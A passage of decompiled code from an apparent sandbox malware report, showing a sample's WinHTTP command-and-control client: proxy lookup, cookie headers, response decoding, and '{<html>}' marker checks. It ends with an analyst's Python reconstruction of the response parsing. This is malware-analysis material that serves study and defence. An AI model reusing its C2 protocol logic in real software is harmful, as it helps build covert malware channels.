                                  																					}
                                  																				}
                                  																			} else {
                                  																				_t1349 = _t1349 + 0x14;
                                  																				__eflags = _t1349;
                                  																				do {
                                  																					_t1220 =  *_t1349;
                                  																					__eflags = _t1220 - 8;
                                  																					if(_t1220 < 8) {
                                  																						goto L137;
                                  																					} else {
                                  																						_t960 =  *((intOrPtr*)(_t1349 - 0x14));
                                  																						_t1221 = 2 + _t1220 * 2;
                                  																						__eflags = _t1221 - 0x1000;
                                  																						if(_t1221 < 0x1000) {
                                  																							L136:
                                  																							_push(_t1221);
                                  																							E00BF4B47(_t960);
                                  																							_t1393 = _t1393 + 8;
                                  																							goto L137;
                                  																						} else {
                                  																							_t1250 =  *((intOrPtr*)(_t960 - 4));
                                  																							_t1085 = _t1221 + 0x23;
                                  																							__eflags = _t960 - _t1250 + 0xfffffffc - 0x1f;
                                  																							if(__eflags > 0) {
                                  																								goto L220;
                                  																							} else {
                                  																								_t960 = _t1250;
                                  																								goto L136;
                                  																							}
                                  																						}
                                  																					}
                                  																					goto L338;
                                  																					L137:
                                  																					 *(_t1349 - 4) = 0;
                                  																					 *((short*)(_t1349 - 0x14)) = 0;
                                  																					 *_t1349 = 7;
                                  																					_t1349 = _t1349 + 0x18;
                                  																					__eflags = _t1349 - 0x14 - _v4316;
                                  																				} while (_t1349 - 0x14 != _v4316);
                                  																				_t1349 = _v4292;
                                  																				goto L139;
                                  																			}
                                  																		}
                                  																	} else {
                                  																		_t1222 = _v4204;
                                  																		_t1309 = 2 + _t1309 * 2;
                                  																		_t964 = _t1222;
                                  																		__eflags = _t1309 - 0x1000;
                                  																		if(_t1309 < 0x1000) {
                                  																			L128:
                                  																			_push(_t1309);
                                  																			E00BF4B47(_t1222);
                                  																			_t1393 = _t1393 + 8;
                                  																			goto L129;
                                  																		} else {
                                  																			_t1085 =  *((intOrPtr*)(_t1222 - 4));
                                  																			_t1250 = _t1309 + 0x23;
                                  																			__eflags = _t964 -  *((intOrPtr*)(_t1222 - 4)) + 0xfffffffc - 0x1f;
                                  																			if(__eflags > 0) {
                                  																				goto L220;
                                  																			} else {
                                  																				goto L128;
                                  																			}
                                  																		}
                                  																	}
                                  																} else {
                                  																	_t971 = (_v4316 - _t1349 >> 3) * 0xaaaaaaab;
                                  																	__eflags = _t971;
                                  																	if(_t971 == 0) {
                                  																		goto L125;
                                  																	} else {
                                  																		_t1223 =  &(_t1330[0x24]);
                                  																		_v4304 = 0;
                                  																		_v4280 =  &(_t1330[0x24]);
                                  																		_t1348 = _t971;
                                  																		do {
                                  																			__eflags =  *(_t1349 + 0x14) - 8;
                                  																			_t972 = _t1349;
                                  																			if( *(_t1349 + 0x14) >= 8) {
                                  																				_t972 =  *_t1349;
                                  																			}
                                  																			_push( *((intOrPtr*)(_t1349 + 0x10)));
                                  																			E00BE8930(_t1062, _t1223, _t972);
                                  																			__eflags = _v4304 - _t1348 - 1;
                                  																			if(_v4304 != _t1348 - 1) {
                                  																				_push(2);
                                  																				E00BE8930(_t1062, _v4280, L"; ");
                                  																			}
                                  																			_t1349 = _t1349 + 0x18;
                                  																			_t1223 = _v4280;
                                  																			_t976 = _v4304 + 1;
                                  																			_v4304 = _t976;
                                  																			__eflags = _t976 - _t1348;
                                  																		} while (_t976 < _t1348);
                                  																		_t1330 = _v4348;
                                  																		_push(1);
                                  																		_v4236 = 0;
                                  																		_v4232 = 7;
                                  																		_v4252 = 0;
                                  																		E00BE7B00(_t1062,  &_v4252, _t1322, _t1330, " ");
                                  																		_v8 = 4;
                                  																		_t1349 =  &(_t1330[0x24]);
                                  																		_t980 = E00BD4830(_t1062,  &_v4276, _t1349, _t1330,  &_v4252);
                                  																		_t1393 = _t1393 + 4;
                                  																		E00BE5D00(_t1062, _t1349, _t980);
                                  																		_t1324 = _v4256;
                                  																		__eflags = _t1324 - 8;
                                  																		if(_t1324 < 8) {
                                  																			L115:
                                  																			_v8 = 3;
                                  																			_t1325 = _v4232;
                                  																			_v4260 = 0;
                                  																			_v4256 = 7;
                                  																			_v4276 = 0;
                                  																			__eflags = _t1325 - 8;
                                  																			if(_t1325 < 8) {
                                  																				L119:
                                  																				_t1326 = _t1330[0x28];
                                  																				__eflags = _t1326;
                                  																				if(_t1326 != 0) {
                                  																					__eflags =  *(_t1349 + 0x14) - 8;
                                  																					_t983 = _t1349;
                                  																					if( *(_t1349 + 0x14) >= 8) {
                                  																						_t983 =  *_t1349;
                                  																					}
                                  																					__eflags =  *((short*)(_t983 + _t1326 * 2 - 2)) - 0x3b;
                                  																					if( *((short*)(_t983 + _t1326 * 2 - 2)) != 0x3b) {
                                  																						_push(1);
                                  																						E00BE8930(_t1062, _t1349, ";");
                                  																					}
                                  																				}
                                  																				_t1349 = _v4292;
                                  																				goto L125;
                                  																			} else {
                                  																				_t1228 = _v4252;
                                  																				_t1327 = 2 + _t1325 * 2;
                                  																				_t985 = _t1228;
                                  																				__eflags = _t1327 - 0x1000;
                                  																				if(_t1327 < 0x1000) {
                                  																					L118:
                                  																					_push(_t1327);
                                  																					E00BF4B47(_t1228);
                                  																					_t1393 = _t1393 + 8;
                                  																					goto L119;
                                  																				} else {
                                  																					_t1085 =  *((intOrPtr*)(_t1228 - 4));
                                  																					_t1250 = _t1327 + 0x23;
                                  																					__eflags = _t985 -  *((intOrPtr*)(_t1228 - 4)) + 0xfffffffc - 0x1f;
                                  																					if(__eflags > 0) {
                                  																						goto L220;
                                  																					} else {
                                  																						goto L118;
                                  																					}
                                  																				}
                                  																			}
                                  																		} else {
                                  																			_t1229 = _v4276;
                                  																			_t1328 = 2 + _t1324 * 2;
                                  																			_t989 = _t1229;
                                  																			__eflags = _t1328 - 0x1000;
                                  																			if(_t1328 < 0x1000) {
                                  																				L114:
                                  																				_push(_t1328);
                                  																				E00BF4B47(_t1229);
                                  																				_t1393 = _t1393 + 8;
                                  																				goto L115;
                                  																			} else {
                                  																				_t1085 =  *((intOrPtr*)(_t1229 - 4));
                                  																				_t1250 = _t1328 + 0x23;
                                  																				__eflags = _t989 -  *((intOrPtr*)(_t1229 - 4)) + 0xfffffffc - 0x1f;
                                  																				if(__eflags > 0) {
                                  																					goto L220;
                                  																				} else {
                                  																					goto L114;
                                  																				}
                                  																			}
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  														} else {
                                  															__eflags = GetLastError() - 0x7a;
                                  															if(__eflags != 0) {
                                  																L144:
                                  																_t852 =  &_v4288;
                                  																_v4288 = 0;
                                  																__imp__WinHttpQueryHeaders(_t1349, 0x13, 0, 0, _t852, 0);
                                  																__eflags = _t852;
                                  																if(__eflags != 0) {
                                  																	L146:
                                  																	_t1309 = _v4288 * 2 >> 0x20;
                                  																	_t1366 = E00BF4B55(_v4288 * 2 >> 0x20, __eflags,  ~(0 | __eflags > 0x00000000) | _v4288 * 0x00000002);
                                  																	E00BF71C0(_t1330, _t1366, 0, _v4288 + _v4288);
                                  																	_t1394 = _t1384 + 0x10;
                                  																	_t857 =  &_v4288;
                                  																	__imp__WinHttpQueryHeaders(_v4296, 0x13, 0, _t1366, _t857, 0);
                                  																	__eflags = _t857;
                                  																	if(_t857 != 0) {
                                  																		_t1203 = _t1366;
                                  																		_t285 = _t1203 + 2; // 0x2
                                  																		_t1309 = _t285;
                                  																		do {
                                  																			_t933 =  *_t1203;
                                  																			_t1203 = _t1203 + 2;
                                  																			__eflags = _t933;
                                  																		} while (_t933 != 0);
                                  																		_t1204 = _t1203 - _t1309;
                                  																		__eflags = _t1204;
                                  																		_push(_t1204 >> 1);
                                  																		E00BE7B00(_t1062,  &(_t1330[0x3f]), _t1309, _t1330, _t1366);
                                  																	}
                                  																	E00BF44E1(_t1366);
                                  																	_t1384 = _t1394 + 4;
                                  																} else {
                                  																	__eflags = GetLastError() - 0x7a;
                                  																	if(__eflags == 0) {
                                  																		goto L146;
                                  																	}
                                  																}
                                  																_t859 = _t1330[0x20];
                                  																_t1367 = 0;
                                  																_v4304 = 0;
                                  																_v4308 = 0x2800;
                                  																__eflags = _t1330[0x20];
                                  																if(__eflags != 0) {
                                  																	E00BF44E1(_t859);
                                  																	_t1384 = _t1384 + 4;
                                  																	_t1330[0x20] = 0;
                                  																}
                                  																_t1330[0x20] = E00BF4B55(_t1309, __eflags, 0x2800);
                                  																E00BF71C0(_t1330, _t860, 0, 0x2800);
                                  																_t1395 = _t1384 + 0x10;
                                  																asm("o16 nop [eax+eax]");
                                  																do {
                                  																	_t862 =  &_v4288;
                                  																	_v4288 = 0;
                                  																	__imp__WinHttpQueryDataAvailable(_v4296, _t862);
                                  																	__eflags = _t862;
                                  																	if(_t862 == 0) {
                                  																		_t1330[0x3e] = GetLastError();
                                  																	} else {
                                  																		_t1311 = _t1330[0x22];
                                  																		__eflags = _t1311;
                                  																		if(__eflags != 0) {
                                  																			_t1199 = _t1330[0x23];
                                  																			__eflags = _t1199;
                                  																			if(__eflags != 0) {
                                  																				asm("movd xmm1, esi");
                                  																				asm("cvtdq2pd xmm1, xmm1");
                                  																				asm("movd xmm0, ecx");
                                  																				asm("addsd xmm1, [eax*8+0xc285c0]");
                                  																				asm("cvtdq2pd xmm0, xmm0");
                                  																				__eflags = _t1199 >> 0x1f;
                                  																				asm("mulsd xmm1, [0xc28560]");
                                  																				asm("addsd xmm0, [ecx*8+0xc285c0]");
                                  																				asm("divsd xmm1, xmm0");
                                  																				asm("movsd [esp], xmm1");
                                  																				 *_t1311();
                                  																				_t1395 = _t1395 - 8 + 8;
                                  																			}
                                  																		}
                                  																		_v4280 = E00BF4B55(_t1311, __eflags, _v4288 + 1);
                                  																		E00BF71C0(_t1330, _t917, 0, _v4288 + 1);
                                  																		_t1396 = _t1395 + 0x10;
                                  																		_v4292 = 0;
                                  																		_t919 =  &_v4292;
                                  																		__imp__WinHttpReadData(_v4296, _v4280, _v4288, _t919);
                                  																		__eflags = _t919;
                                  																		if(_t919 != 0) {
                                  																			_t1201 = _v4292;
                                  																			_t1320 = _v4308;
                                  																			__eflags = _t1201 + _t1367 - _t1320;
                                  																			if(_t1201 + _t1367 > _t1320) {
                                  																				_t1321 = _t1320 + _t1320;
                                  																				__eflags = _t1321;
                                  																				_v4308 = _t1321;
                                  																				_t1330[0x20] = E00BF4B55(_t1321, _t1321, _t1321);
                                  																				E00BF71C0(_t1330, _t925, 0, _v4308);
                                  																				E00BF73D0(_t1330[0x20], _t1330[0x20], _v4304);
                                  																				E00BF44E1(_t1330[0x20]);
                                  																				_t1201 = _v4292;
                                  																				_t1396 = _t1396 + 0x20;
                                  																				_t1367 = _v4304;
                                  																			}
                                  																			E00BF73D0( &(_t1330[0x20][_t1367]), _v4280, _t1201);
                                  																			_t1396 = _t1396 + 0xc;
                                  																			_t1367 = _t1367 + _v4292;
                                  																			__eflags = _t1367;
                                  																			_v4304 = _t1367;
                                  																		}
                                  																		E00BF44E1(_v4280);
                                  																		_t1395 = _t1396 + 4;
                                  																	}
                                  																	__eflags = _v4288;
                                  																} while (_v4288 > 0);
                                  																_t1312 = _t1330[0x22];
                                  																__eflags = _t1312;
                                  																if(_t1312 != 0) {
                                  																	_t1197 = _t1330[0x23];
                                  																	__eflags = _t1197;
                                  																	if(_t1197 != 0) {
                                  																		asm("movd xmm1, esi");
                                  																		asm("cvtdq2pd xmm1, xmm1");
                                  																		asm("movd xmm0, ecx");
                                  																		asm("addsd xmm1, [eax*8+0xc285c0]");
                                  																		asm("cvtdq2pd xmm0, xmm0");
                                  																		__eflags = _t1197 >> 0x1f;
                                  																		asm("mulsd xmm1, [0xc28560]");
                                  																		asm("addsd xmm0, [ecx*8+0xc285c0]");
                                  																		asm("divsd xmm1, xmm0");
                                  																		asm("movsd [esp], xmm1");
                                  																		 *_t1312();
                                  																		_t1395 = _t1395 - 8 + 8;
                                  																	}
                                  																}
                                  																_t1330[0x21] = _t1367;
                                  																_t864 =  &(_t1330[0x1a]);
                                  																_t1368 = 0;
                                  																_v4292 = 1;
                                  																__eflags = _t864[5] - 8;
                                  																_v4280 = 0;
                                  																if(_t864[5] >= 8) {
                                  																	_t864 =  *_t864;
                                  																}
                                  																_t865 = E00C01F2F(_t1062, _t1330, _t1368, _t864, L"utf-8", 5);
                                  																_t1384 = _t1395 + 0xc;
                                  																__eflags = _t865;
                                  																if(_t865 == 0) {
                                  																	_t1368 = 0xfde9;
                                  																	_v4292 = _t865;
                                  																	_v4280 = 0xfde9;
                                  																}
                                  																_t1369 = MultiByteToWideChar(_t1368, _v4292, _t1330[0x20], _t1330[0x21] + 1, 0, 0);
                                  																__eflags = _t1369;
                                  																if(__eflags > 0) {
                                  																	L174:
                                  																	_v4344 = E00BF4B55(_t1369 * 2 >> 0x20, __eflags,  ~(0 | __eflags > 0x00000000) | _t1369 * 0x00000002);
                                  																	E00BF71C0(_t1330, _t871, 0, _t1369 + _t1369);
                                  																	_t1397 = _t1384 + 0x10;
                                  																	_t1370 = _v4344;
                                  																	_t873 = MultiByteToWideChar(_v4280, _v4292, _t1330[0x20], _t1330[0x21] + 1, _t1370, _t1369);
                                  																	__eflags = _t873;
                                  																	if(_t873 > 0) {
                                  																		_t1193 = _t1370;
                                  																		_t1319 =  &(_t1193[1]);
                                  																		do {
                                  																			_t907 =  *_t1193;
                                  																			_t1193 =  &(_t1193[1]);
                                  																			__eflags = _t907;
                                  																		} while (_t907 != 0);
                                  																		_t1194 = _t1193 - _t1319;
                                  																		__eflags = _t1194;
                                  																		_push(_t1194 >> 1);
                                  																		E00BE7B00(_t1062,  &(_t1330[0x14]), _t1319, _t1330, _t1370);
                                  																	}
                                  																	E00BF44E1(_t1370);
                                  																	_t1384 = _t1397 + 4;
                                  																} else {
                                  																	_v4280 = 0;
                                  																	_v4292 = 1;
                                  																	_t1369 = MultiByteToWideChar(0, 1, _t1330[0x20], _t1330[0x21] + 1, 0, 0);
                                  																	__eflags = _t1369;
                                  																	if(__eflags > 0) {
                                  																		goto L174;
                                  																	}
                                  																}
                                  																__eflags = _v4208 - 8;
                                  																_v4297 = 1;
                                  																_t1184 =  >=  ? _v4228 :  &_v4228;
                                  																__eflags = _v4212 - 3;
                                  																if(_v4212 != 3) {
                                  																	L209:
                                  																	_t1349 = _v4296;
                                  																	goto L210;
                                  																} else {
                                  																	_t1371 = 3;
                                  																	_t1315 = L"GET";
                                  																	while(1) {
                                  																		__eflags =  *_t1184 -  *_t1315;
                                  																		if( *_t1184 !=  *_t1315) {
                                  																			goto L209;
                                  																		}
                                  																		_t1184 = _t1184 + 2;
                                  																		_t1315 = _t1315 + 2;
                                  																		_t1371 = _t1371 - 1;
                                  																		__eflags = _t1371;
                                  																		if(_t1371 != 0) {
                                  																			continue;
                                  																		} else {
                                  																			_push(8);
                                  																			_v4188 = _t1371;
                                  																			_t1185 =  &_v4204;
                                  																			_v4184 = 7;
                                  																			_v4204 = 0;
                                  																			E00BE7B00(_t1062, _t1185, _t1315, _t1330, L"{<html>}");
                                  																			_v4332 = _t1371;
                                  																			_v4328 = _t1371;
                                  																			_v4324 = _t1371;
                                  																			_push(_t1185);
                                  																			_v8 = 6;
                                  																			_t1349 =  &(_t1330[0x14]);
                                  																			_t879 = E00BD4300(_t1062,  &_v4204, _t1330, _t1349, _t1185, _t1349,  &_v4332);
                                  																			_t1187 = _v4332;
                                  																			_t1384 = _t1384 + 0x10;
                                  																			_t1316 = _v4328;
                                  																			_v4280 = _t1187;
                                  																			__eflags = _t879;
                                  																			if(_t879 != 0) {
                                  																				__eflags = (_t1316 - _t1187 >> 3) * 0xaaaaaaab;
                                  																				if((_t1316 - _t1187 >> 3) * 0xaaaaaaab != 0) {
                                  																					_push(9);
                                  																					_t1191 =  &_v4204;
                                  																					E00BE7B00(_t1062, _t1191, _t1316, _t1330, L"{</html>}");
                                  																					_push(_t1191);
                                  																					_t904 = E00BD4300(_t1062,  &_v4204, _t1330, _t1349, _t1191, _t1349,  &_v4332);
                                  																					_t1187 = _v4332;
                                  																					_t1384 = _t1384 + 0x10;
                                  																					_t1316 = _v4328;
                                  																					_v4280 = _t1187;
                                  																					__eflags = _t904;
                                  																					if(_t904 == 0) {
                                  																						L187:
                                  																						_t1330[0x3e] = 0xd;
                                  																						_v4297 = 0;
                                  																					} else {
                                  																						__eflags = _t1316 == _t1187;
                                  																						if(_t1316 == _t1187) {
                                  																							goto L187;
                                  																						}
                                  																					}
                                  																				}
                                  																			}
                                  																			_v8 = 5;
                                  																			__eflags = _t1187;
                                  																			if(_t1187 == 0) {
                                  																				L201:
                                  																				_v8 = 0;
                                  																				_t1307 = _v4184;
                                  																				__eflags = _t1307 - 8;
                                  																				if(_t1307 < 8) {
                                  																					L205:
                                  																					__eflags = _v4297;
                                  																					_t1349 = _v4296;
                                  																					if(_v4297 != 0) {
                                  																						L210:
                                  																						__imp__WinHttpCloseHandle(_t1349);
                                  																						goto L211;
                                  																					} else {
                                  																						_t1158 = _v4336;
                                  																						goto L22;
                                  																					}
                                  																				} else {
                                  																					_t1188 = _v4204;
                                  																					_t1307 = 2 + _t1307 * 2;
                                  																					_t880 = _t1188;
                                  																					__eflags = _t1307 - 0x1000;
                                  																					if(_t1307 < 0x1000) {
                                  																						L204:
                                  																						_push(_t1307);
                                  																						E00BF4B47(_t1188);
                                  																						_t1384 = _t1384 + 8;
                                  																						goto L205;
                                  																					} else {
                                  																						_t1085 =  *((intOrPtr*)(_t1188 - 4));
                                  																						_t1250 = _t1307 + 0x23;
                                  																						__eflags = _t880 -  *((intOrPtr*)(_t1188 - 4)) + 0xfffffffc - 0x1f;
                                  																						if(__eflags > 0) {
                                  																							goto L220;
                                  																						} else {
                                  																							goto L204;
                                  																						}
                                  																					}
                                  																				}
                                  																			} else {
                                  																				__eflags = _t1187 - _t1316;
                                  																				if(_t1187 == _t1316) {
                                  																					L198:
                                  																					_t888 = _t1187;
                                  																					_t1318 = (_v4324 - _t1187 >> 3) * 0xaaaaaaab + (_v4324 - _t1187 >> 3) * 0xaaaaaaab * 2 << 3;
                                  																					__eflags = _t1318 - 0x1000;
                                  																					if(_t1318 < 0x1000) {
                                  																						L200:
                                  																						_push(_t1318);
                                  																						E00BF4B47(_t1187);
                                  																						_t1384 = _t1384 + 8;
                                  																						_v4332 = 0;
                                  																						_v4328 = 0;
                                  																						_v4324 = 0;
                                  																						goto L201;
                                  																					} else {
                                  																						_t1085 =  *((intOrPtr*)(_t1187 - 4));
                                  																						_t1250 = _t1318 + 0x23;
                                  																						__eflags = _t888 -  *((intOrPtr*)(_t1187 - 4)) + 0xfffffffc - 0x1f;
                                  																						if(__eflags > 0) {
                                  																							goto L220;
                                  																						} else {
                                  																							goto L200;
                                  																						}
                                  																					}
                                  																				} else {
                                  																					_t1349 = _t1187 + 0x14;
                                  																					do {
                                  																						_t1189 =  *_t1349;
                                  																						__eflags = _t1189 - 8;
                                  																						if(_t1189 < 8) {
                                  																							goto L196;
                                  																						} else {
                                  																							_t894 =  *((intOrPtr*)(_t1349 - 0x14));
                                  																							_t1190 = 2 + _t1189 * 2;
                                  																							__eflags = _t1190 - 0x1000;
                                  																							if(_t1190 < 0x1000) {
                                  																								L195:
                                  																								_push(_t1190);
                                  																								E00BF4B47(_t894);
                                  																								_t1316 = _v4328;
                                  																								_t1384 = _t1384 + 8;
                                  																								goto L196;
                                  																							} else {
                                  																								_t1250 =  *((intOrPtr*)(_t894 - 4));
                                  																								_t1085 = _t1190 + 0x23;
                                  																								__eflags = _t894 - _t1250 + 0xfffffffc - 0x1f;
                                  																								if(__eflags > 0) {
                                  																									goto L220;
                                  																								} else {
                                  																									_t894 = _t1250;
                                  																									goto L195;
                                  																								}
                                  																							}
                                  																						}
                                  																						goto L338;
                                  																						L196:
                                  																						 *(_t1349 - 4) = 0;
                                  																						 *((short*)(_t1349 - 0x14)) = 0;
                                  																						 *_t1349 = 7;
                                  																						_t1349 = _t1349 + 0x18;
                                  																						__eflags = _t1349 - 0x14 - _t1316;
                                  																					} while (_t1349 - 0x14 != _t1316);
                                  																					_t1187 = _v4280;
                                  																					goto L198;
                                  																				}
                                  																			}
                                  																		}
                                  																		goto L338;
                                  																	}
                                  																	goto L209;
                                  																}
                                  															} else {
                                  																goto L82;
                                  															}
                                  														}
                                  													}
                                  												} else {
                                  													_t1015 =  &_v4196;
                                  													asm("xorps xmm0, xmm0");
                                  													asm("movups [ebp-0x1060], xmm0");
                                  													__imp__WinHttpGetIEProxyConfigForCurrentUser(_t1015);
                                  													__eflags = _t1015;
                                  													if(_t1015 == 0) {
                                  														L207:
                                  														_t844 = GetLastError();
                                  														_t1158 = _v4336;
                                  														_t1330[0x3e] = _t844;
                                  														continue;
                                  													} else {
                                  														_t1016 = _v4192;
                                  														__eflags = _t1016;
                                  														if(_t1016 == 0) {
                                  															_t1374 = _v4188;
                                  															__eflags = _t1374;
                                  															if(_t1374 != 0) {
                                  																_v4376 = 3;
                                  																asm("xorps xmm0, xmm0");
                                  																asm("movlpd [ebp-0x1110], xmm0");
                                  																E00BF71C0(_t1330,  &_v540, 0, 0x208);
                                  																E00C00FED( &_v540, 0x104, _t1374);
                                  																_t1375 = _v4184;
                                  																_t1384 = _t1384 + 0x18;
                                  																_v4372 =  &_v540;
                                  																__eflags = _t1375;
                                  																if(_t1375 != 0) {
                                  																	E00BF71C0(_t1330,  &_v1580, 0, 0x208);
                                  																	E00C00FED( &_v1580, 0x104, _t1375);
                                  																	_t1384 = _t1384 + 0x18;
                                  																	_v4368 =  &_v1580;
                                  																}
                                  																_t1024 =  &_v4376;
                                  																__imp__WinHttpSetOption(_v4296, 0x26, _t1024, 0xc);
                                  																__eflags = _t1024;
                                  																if(_t1024 == 0) {
                                  																	goto L68;
                                  																}
                                  																goto L69;
                                  															}
                                  														} else {
                                  															__eflags = _t1330[7] - 8;
                                  															asm("xorps xmm0, xmm0");
                                  															_v4404 = _t1016;
                                  															_t1035 =  &(_t1330[2]);
                                  															_v4412 = 3;
                                  															_v4408 = 1;
                                  															_v4392 = 1;
                                  															_v4396 = 0;
                                  															_v4400 = 0;
                                  															asm("movq [ebp-0x1108], xmm0");
                                  															_v4356 = 0;
                                  															if(_t1330[7] >= 8) {
                                  																_t1035 = _t1330[2];
                                  															}
                                  															__imp__WinHttpGetProxyForUrl( *_t1330, _t1035,  &_v4412,  &_v4364);
                                  															__eflags = _t1035;
                                  															if(_t1035 == 0) {
                                  																L68:
                                  																_t1330[0x3e] = GetLastError();
                                  															} else {
                                  																_t1036 =  &_v4364;
                                  																__imp__WinHttpSetOption(_t1349, 0x26, _t1036, 0xc);
                                  																__eflags = _t1036;
                                  																if(_t1036 != 0) {
                                  																	__imp__WinHttpSendRequest(_t1349, 0, 0, 0, 0, 0, 0);
                                  																	__eflags = _t1036;
                                  																	_t1241 =  !=  ? 1 : _v4340 & 0x000000ff;
                                  																	_v4340 =  !=  ? 1 : _v4340 & 0x000000ff;
                                  																}
                                  																_t1037 = _v4360;
                                  																__eflags = _t1037;
                                  																if(_t1037 != 0) {
                                  																	GlobalFree(_t1037);
                                  																}
                                  																_t1038 = _v4356;
                                  																__eflags = _t1038;
                                  																if(_t1038 != 0) {
                                  																	GlobalFree(_t1038);
                                  																}
                                  															}
                                  															L69:
                                  															_t1025 = _v4192;
                                  															__eflags = _t1025;
                                  															if(_t1025 != 0) {
                                  																GlobalFree(_t1025);
                                  															}
                                  															_t1026 = _v4188;
                                  															__eflags = _t1026;
                                  															if(_t1026 != 0) {
                                  																GlobalFree(_t1026);
                                  															}
                                  														}
                                  														_t1017 = _v4184;
                                  														__eflags = _t1017;
                                  														if(_t1017 != 0) {
                                  															GlobalFree(_t1017);
                                  														}
                                  														__eflags = _v4340;
                                  														_t1349 = _v4296;
                                  														_t1158 = _v4336;
                                  														if(_v4340 == 0) {
                                  															continue;
                                  														} else {
                                  															goto L76;
                                  														}
                                  													}
                                  												}
                                  											} else {
                                  												_push(8);
                                  												_v4188 = 0;
                                  												_v4184 = 7;
                                  												_v4204 = 0;
                                  												E00BE7B00(_t1062,  &_v4204, _t1307, _t1330, L"Cookie: ");
                                  												_v8 = 1;
                                  												_t1245 =  &(_t1330[0x2a]);
                                  												__eflags = _t1330[0x2f] - 8;
                                  												if(_t1330[0x2f] >= 8) {
                                  													_t1245 = _t1330[0x2a];
                                  												}
                                  												E00BE8930(_t1062,  &_v4204, _t1245);
                                  												__eflags = _v4184 - 8;
                                  												_t842 =  >=  ? _v4204 :  &_v4204;
                                  												__imp__WinHttpAddRequestHeaders(_t1349, _t842, _v4188, 0x1000000, _t1330[0x2e]);
                                  												__eflags = _t842;
                                  												if(_t842 == 0) {
                                  													_t842 = GetLastError();
                                  													_t1330[0x3e] = _t842;
                                  												}
                                  												_v8 = 0;
                                  												_t1307 = _v4184;
                                  												__eflags = _t1307 - 8;
                                  												if(_t1307 < 8) {
                                  													goto L37;
                                  												} else {
                                  													_t1247 = _v4204;
                                  													_t1307 = 2 + _t1307 * 2;
                                  													_t1056 = _t1247;
                                  													__eflags = _t1307 - 0x1000;
                                  													if(_t1307 < 0x1000) {
                                  														L36:
                                  														_push(_t1307);
                                  														_t842 = E00BF4B47(_t1247);
                                  														_t1384 = _t1384 + 8;
                                  														goto L37;
                                  													} else {
                                  														_t1085 =  *((intOrPtr*)(_t1247 - 4));
                                  														_t1250 = _t1307 + 0x23;
                                  														__eflags = _t1056 -  *((intOrPtr*)(_t1247 - 4)) + 0xfffffffc - 0x1f;
                                  														if(__eflags > 0) {
                                  															goto L220;
                                  														} else {
                                  															goto L36;
                                  														}
                                  													}
                                  												}
                                  											}
                                  											goto L338;
                                  										}
                                  										_v4281 = 0;
                                  										goto L210;
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							__eflags = _t1330[0x4a] - 8;
                                  							_t1060 =  &(_t1330[0x45]);
                                  							if(_t1330[0x4a] >= 8) {
                                  								_t1060 =  *_t1060;
                                  							}
                                  							__imp__WinHttpOpen(_t1060, 0, 0, 0, 0);
                                  							 *_t1330 = _t1060;
                                  							__eflags = _t1060;
                                  							if(_t1060 != 0) {
                                  								goto L11;
                                  							} else {
                                  								_t693 = GetLastError();
                                  								L213:
                                  								_t1330[0x3e] = _t693;
                                  								_v4281 = 0;
                                  								L214:
                                  								_t1249 = _v4208;
                                  								__eflags = _t1249 - 8;
                                  								if(_t1249 < 8) {
                                  									L218:
                                  									goto L219;
                                  								} else {
                                  									_t1085 = _v4228;
                                  									_t1250 = 2 + _t1249 * 2;
                                  									_t696 = _t1085;
                                  									__eflags = _t1250 - 0x1000;
                                  									if(_t1250 < 0x1000) {
                                  										L217:
                                  										_push(_t1250);
                                  										E00BF4B47(_t1085);
                                  										goto L218;
                                  									} else {
                                  										_t1085 =  *((intOrPtr*)(_t1085 - 4));
                                  										_t1250 = _t1250 + 0x23;
                                  										__eflags = _t696 - _t1085 + 0xfffffffc - 0x1f;
                                  										if(__eflags > 0) {
                                  											L220:
                                  											E00C01351(_t1062, _t1085, _t1250, _t1330, __eflags);
                                  											asm("int3");
                                  											asm("int3");
                                  											asm("int3");
                                  											asm("int3");
                                  											asm("int3");
                                  											asm("int3");
                                  											asm("int3");
                                  											asm("int3");
                                  											asm("int3");
                                  											asm("int3");
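Added analyst example (not the sample's code and not part of the Joe Sandbox output): a Python reconstruction of the response handling visible in the function above. The listing compares the charset against "utf-8" and loads 0xfde9 (CP_UTF8) on a match, calls MultiByteToWideChar twice (size query, then conversion) and retries with code page 0 (CP_ACP) if the first conversion fails, and for a "GET" request requires both the "{<html>}" and "{</html>}" markers in the body, storing error 0xd (ERROR_INVALID_DATA) and marking the request failed if either is missing. Assumptions made here: the charset compare is case-insensitive, cp1252 stands in for CP_ACP (which has no meaning off Windows), the code page used for non-utf-8 charsets was set before this section and is taken to be CP_ACP, and the code after the marker check (not shown) consumes the text between the markers, so that is what is returned. The sample responses are constructed, not captured traffic.

```python
"""Reconstruction of the C2 response handling; example code, not the sample's."""

CP_UTF8 = 65001          # 0xfde9, loaded by the listing when charset == "utf-8"
CP_ACP = 0               # code page used by the retry branch
ERROR_INVALID_DATA = 13  # 0xd, written to the request object when a marker is missing

START_MARK = "{<html>}"
END_MARK = "{</html>}"

# Assumption: cp1252 stands in for CP_ACP so the example runs on any platform.
ANSI_STAND_IN = "cp1252"


class C2ResponseError(Exception):
    """Raised where the listing stores a Win32 error code and aborts the request."""

    def __init__(self, code):
        super().__init__(f"win32 error {code}")
        self.code = code


def select_code_page(charset):
    """Only a charset of utf-8 selects CP_UTF8; everything else falls back to
    CP_ACP here (assumption: the real code page is chosen before this section,
    and the utf-8 compare is case-insensitive)."""
    if charset is not None and charset.lower() == "utf-8":
        return CP_UTF8
    return CP_ACP


def body_to_text(raw, charset):
    """Mirror of the two MultiByteToWideChar attempts: convert with the selected
    code page, and if that fails retry with CP_ACP instead of giving up."""
    codec = "utf-8" if select_code_page(charset) == CP_UTF8 else ANSI_STAND_IN
    try:
        return raw.decode(codec, errors="strict")
    except UnicodeDecodeError:
        # Retry branch: code page 0 with MB_PRECOMPOSED in the listing.
        return raw.decode(ANSI_STAND_IN, errors="replace")


def extract_payload(text, method="GET"):
    """For GET responses both markers must be present, in order; a missing marker
    is ERROR_INVALID_DATA. Non-GET bodies pass through untouched, as the listing
    skips the marker check unless the method compares equal to "GET"."""
    if method != "GET":
        return text
    start = text.find(START_MARK)
    if start < 0:
        raise C2ResponseError(ERROR_INVALID_DATA)
    start += len(START_MARK)
    end = text.find(END_MARK, start)
    if end < 0:
        raise C2ResponseError(ERROR_INVALID_DATA)
    # Assumption: the code after the check (not shown) uses the text in between.
    return text[start:end]


def handle_response(raw, charset, method="GET"):
    """Full path: bytes from WinHttpReadData -> wide string -> payload."""
    return extract_payload(body_to_text(raw, charset), method)


# Constructed sample responses (not captured traffic).
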